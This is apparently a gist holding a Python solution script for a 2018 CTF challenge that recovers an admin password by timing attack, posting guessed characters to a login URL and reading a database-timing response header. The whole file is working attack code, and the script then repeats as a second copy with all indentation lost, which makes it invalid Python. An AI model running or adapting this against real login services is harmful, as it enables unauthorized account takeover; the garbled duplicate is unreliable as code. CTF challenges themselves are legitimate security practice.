DanielBiegler/TROOPERS FUCSS CTF 2018 Timing Attack.py Secret

## TROOPERS FUCSS CTF 2018 Timing Attack.py
import requests
import time
import sys
import string
import json

def main():
	url = 'https://db.fishbowl.tech/login'
	form_input = {
		'username':'admin',
		'password':''
	}
	char_dictionary = string.printable
	num_tries = 2
	sleep_seconds = 0.5
	current_max = 0
	discover_threshhold = 100
	output = {}
	current_pw = [ # 8 * 4 == 32
		'-','-','-','-','-','-','-','-',
		'-','-','-','-','-','-','-','-',
		'-','-','-','-','-','-','-','-',
		'-','-','-','-','-','-','-','-'
	]

	found_pw = [ # 8 * 4 == 32
		'-','-','-','-','-','-','-','-',
		'-','-','-','-','-','-','-','-',
		'-','-','-','-','-','-','-','-',
		'-','-','-','-','-','-','-','-'
	]
	for i in range(0, len(current_pw)):
		for char in char_dictionary:
			current_pw[i] = char
			current_pw_string = ''.join(current_pw)
			tries = []

			for current_try in range(num_tries):
				# no DOS plskthx
				time.sleep(sleep_seconds)

				form_input['password'] = current_pw_string
				resp = requests.post(url, form_input)
				x_dbquery_perf = int(resp.history[0].headers['x-dbquery-perf'][:-2]) # slice 'ms' off
				tries.append(x_dbquery_perf)

			average = sum(tries) / num_tries
			found_pw[i] = char
			print(f"Tried: {''.join(found_pw)} => {average}", file=sys.stderr, end='\r')

			if discover_threshhold < average:
				current_max = average
				found_pw[i] = current_pw[i]
				print(f"==     {''.join(found_pw)}", ' '*10, file=sys.stderr, end='\r')
				# reset the pw to reduce next response time
				current_pw[i] = '-'
				break
	print(file=sys.stderr)
	print(''.join(found_pw))

if __name__ == '__main__':
	main()
	import requests
	import time
	import sys
	import string
	import json

	def main():
	url = 'https://db.fishbowl.tech/login'
	form_input = {
	'username':'admin',
	'password':''
	}
	char_dictionary = string.printable
	num_tries = 2
	sleep_seconds = 0.5
	current_max = 0
	discover_threshhold = 100
	output = {}
	current_pw = [ # 8 * 4 == 32
	'-','-','-','-','-','-','-','-',
	'-','-','-','-','-','-','-','-',
	'-','-','-','-','-','-','-','-',
	'-','-','-','-','-','-','-','-'
	]

	found_pw = [ # 8 * 4 == 32
	'-','-','-','-','-','-','-','-',
	'-','-','-','-','-','-','-','-',
	'-','-','-','-','-','-','-','-',
	'-','-','-','-','-','-','-','-'
	]
	for i in range(0, len(current_pw)):
	for char in char_dictionary:
	current_pw[i] = char
	current_pw_string = ''.join(current_pw)
	tries = []

	for current_try in range(num_tries):
	# no DOS plskthx
	time.sleep(sleep_seconds)

	form_input['password'] = current_pw_string
	resp = requests.post(url, form_input)
	x_dbquery_perf = int(resp.history[0].headers['x-dbquery-perf'][:-2]) # slice 'ms' off
	tries.append(x_dbquery_perf)

	average = sum(tries) / num_tries
	found_pw[i] = char
	print(f"Tried: {''.join(found_pw)} => {average}", file=sys.stderr, end='\r')

	if discover_threshhold < average:
	current_max = average
	found_pw[i] = current_pw[i]
	print(f"== {''.join(found_pw)}", ' '*10, file=sys.stderr, end='\r')
	# reset the pw to reduce next response time
	current_pw[i] = '-'
	break
	print(file=sys.stderr)
	print(''.join(found_pw))

	if __name__ == '__main__':
	main()